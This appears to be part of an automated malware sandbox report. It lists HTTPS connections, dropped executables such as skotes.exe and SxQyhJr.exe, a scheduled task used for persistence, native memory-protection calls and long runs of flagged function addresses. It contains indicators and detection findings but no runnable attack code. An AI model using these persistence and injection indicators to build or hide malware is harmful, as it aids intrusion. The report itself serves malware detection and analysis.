Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2

System Summary
barindex
.NET source code contains very large array initializations
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs Large array initialization: ValidateIntegratedCalculator: array initializer size 361008
Binary is likely a compiled AutoIt script file
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8af1e4f5-e
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_00cfdb3c-4
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name: .idata
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name: .idata
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name: .idata
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: 8b82d73f70.exe.6.dr Static PE information: section name:
Source: 8b82d73f70.exe.6.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536E50 NtProtectVirtualMemory, 7_2_06536E50
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06538F98 NtResumeThread, 7_2_06538F98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536E48 NtProtectVirtualMemory, 7_2_06536E48
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06538F90 NtResumeThread, 7_2_06538F90
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00728860 6_2_00728860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00727049 6_2_00727049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_007278BB 6_2_007278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00722D10 6_2_00722D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006E4DE0 6_2_006E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_007231A8 6_2_007231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00717F36 6_2_00717F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006E4B30 6_2_006E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0072779B 6_2_0072779B
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158CB3C 7_2_0158CB3C
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158F3B8 7_2_0158F3B8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158F3A8 7_2_0158F3A8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C18430 7_2_05C18430
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1E740 7_2_05C1E740
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1A1A0 7_2_05C1A1A0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1B208 7_2_05C1B208
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1B1F8 7_2_05C1B1F8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1A190 7_2_05C1A190
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C11068 7_2_05C11068
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C10E71 7_2_05C10E71
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1F948 7_2_05C1F948
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C10B90 7_2_05C10B90
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C10BA0 7_2_05C10BA0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1EA67 7_2_05C1EA67
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E77B4 7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E5530 7_2_061E5530
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E5540 7_2_061E5540
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F4A68 7_2_061F4A68
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F3788 7_2_061F3788
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F63CB 7_2_061F63CB
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F4A20 7_2_061F4A20
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F4A58 7_2_061F4A58
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FB6B8 7_2_061FB6B8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FB6A7 7_2_061FB6A7
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F3778 7_2_061F3778
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F003A 7_2_061F003A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FF830 7_2_061FF830
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F0040 7_2_061F0040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FA553 7_2_061FA553
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FA560 7_2_061FA560
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_063C001E 7_2_063C001E
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_063C0040 7_2_063C0040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536BC8 7_2_06536BC8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06533570 7_2_06533570
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536BB9 7_2_06536BB9
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06533560 7_2_06533560
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06630040 7_2_06630040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06630023 7_2_06630023
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0664DD70 7_2_0664DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E212E8 8_2_06E212E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E212F8 8_2_06E212F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E23FA8 8_2_06E23FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E23F45 8_2_06E23F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E248F0 8_2_06E248F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E24900 8_2_06E24900
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642F643 13_2_0642F643
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F6E38 13_2_063F6E38
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641DE56 13_2_0641DE56
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641CE5E 13_2_0641CE5E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641966D 13_2_0641966D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642EE75 13_2_0642EE75
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640D678 13_2_0640D678
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DDE07 13_2_063DDE07
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F267F 13_2_063F267F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F1679 13_2_063F1679
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642D608 13_2_0642D608
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FD663 13_2_063FD663
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06418627 13_2_06418627
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640B636 13_2_0640B636
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064036CB 13_2_064036CB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F7EAF 13_2_063F7EAF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06408EE6 13_2_06408EE6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640EEEB 13_2_0640EEEB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641D6F5 13_2_0641D6F5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E56F7 13_2_063E56F7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642469E 13_2_0642469E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640469F 13_2_0640469F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064206A6 13_2_064206A6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F5ED5 13_2_063F5ED5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640CEBB 13_2_0640CEBB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641E747 13_2_0641E747
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642C75A 13_2_0642C75A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06426F5D 13_2_06426F5D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06400F65 13_2_06400F65
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ECF19 13_2_063ECF19
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642D776 13_2_0642D776
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E7708 13_2_063E7708
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641677A 13_2_0641677A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FE702 13_2_063FE702
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640F70A 13_2_0640F70A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640970B 13_2_0640970B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06425F09 13_2_06425F09
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F076E 13_2_063F076E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EFF6C 13_2_063EFF6C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EAF63 13_2_063EAF63
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06419F20 13_2_06419F20
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06422F24 13_2_06422F24
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E9F4D 13_2_063E9F4D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FA745 13_2_063FA745
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642F7C3 13_2_0642F7C3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06410FC3 13_2_06410FC3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FCFB6 13_2_063FCFB6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640BFDD 13_2_0640BFDD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640D7E5 13_2_0640D7E5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06414FE9 13_2_06414FE9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641F7F4 13_2_0641F7F4
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E5FF8 13_2_063E5FF8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06413F86 13_2_06413F86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FF7ED 13_2_063FF7ED
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EA7EB 13_2_063EA7EB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06423F9C 13_2_06423F9C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EF43D 13_2_063EF43D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06429C41 13_2_06429C41
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06411451 13_2_06411451
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641EC56 13_2_0641EC56
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640DC67 13_2_0640DC67
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EA417 13_2_063EA417
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641440F 13_2_0641440F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641B415 13_2_0641B415
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FB469 13_2_063FB469
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641341A 13_2_0641341A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641C425 13_2_0641C425
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FF4AF 13_2_063FF4AF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064104D3 13_2_064104D3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E5C9B 13_2_063E5C9B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EB49B 13_2_063EB49B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EEC98 13_2_063EEC98
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06403CEB 13_2_06403CEB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F2C8B 13_2_063F2C8B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E6C85 13_2_063E6C85
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06424C93 13_2_06424C93
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064304A3 13_2_064304A3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642DCA0 13_2_0642DCA0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06409CA3 13_2_06409CA3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642E4AF 13_2_0642E4AF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064254B0 13_2_064254B0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642ECBA 13_2_0642ECBA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064294BE 13_2_064294BE
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FED3B 13_2_063FED3B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641A548 13_2_0641A548
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F3D24 13_2_063F3D24
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F551D 13_2_063F551D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06408504 13_2_06408504
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EFD57 13_2_063EFD57
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06427D33 13_2_06427D33
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E7D4A 13_2_063E7D4A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F1546 13_2_063F1546
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642CD39 13_2_0642CD39
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640AD3F 13_2_0640AD3F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06421D3D 13_2_06421D3D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06415DC5 13_2_06415DC5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06407DD3 13_2_06407DD3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640DDD7 13_2_0640DDD7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FBDA7 13_2_063FBDA7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641F5DD 13_2_0641F5DD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06418DE0 13_2_06418DE0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06426594 13_2_06426594
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642F24D 13_2_0642F24D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641625D 13_2_0641625D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EB20F 13_2_063EB20F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640BA79 13_2_0640BA79
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ED27D 13_2_063ED27D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640E205 13_2_0640E205
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642A20C 13_2_0642A20C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E7267 13_2_063E7267
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E8A5A 13_2_063E8A5A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641D226 13_2_0641D226
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F5A49 13_2_063F5A49
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641B23C 13_2_0641B23C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064092C7 13_2_064092C7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640F2DF 13_2_0640F2DF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06408AE3 13_2_06408AE3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640EAF6 13_2_0640EAF6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F02F9 13_2_063F02F9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F8AD8 13_2_063F8AD8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641DAAB 13_2_0641DAAB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F22CF 13_2_063F22CF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06412ABA 13_2_06412ABA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06401B46 13_2_06401B46
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ECB33 13_2_063ECB33
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06414B50 13_2_06414B50
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06405363 13_2_06405363
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06419B66 13_2_06419B66
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641BB6D 13_2_0641BB6D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642731B 13_2_0642731B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EC34A 13_2_063EC34A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E9B49 13_2_063E9B49
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641A3C6 13_2_0641A3C6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06413BCA 13_2_06413BCA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FA3A7 13_2_063FA3A7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E9389 13_2_063E9389
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641CBF9 13_2_0641CBF9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FAB86 13_2_063FAB86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064173F8 13_2_064173F8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642C3FE 13_2_0642C3FE
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F73FF 13_2_063F73FF
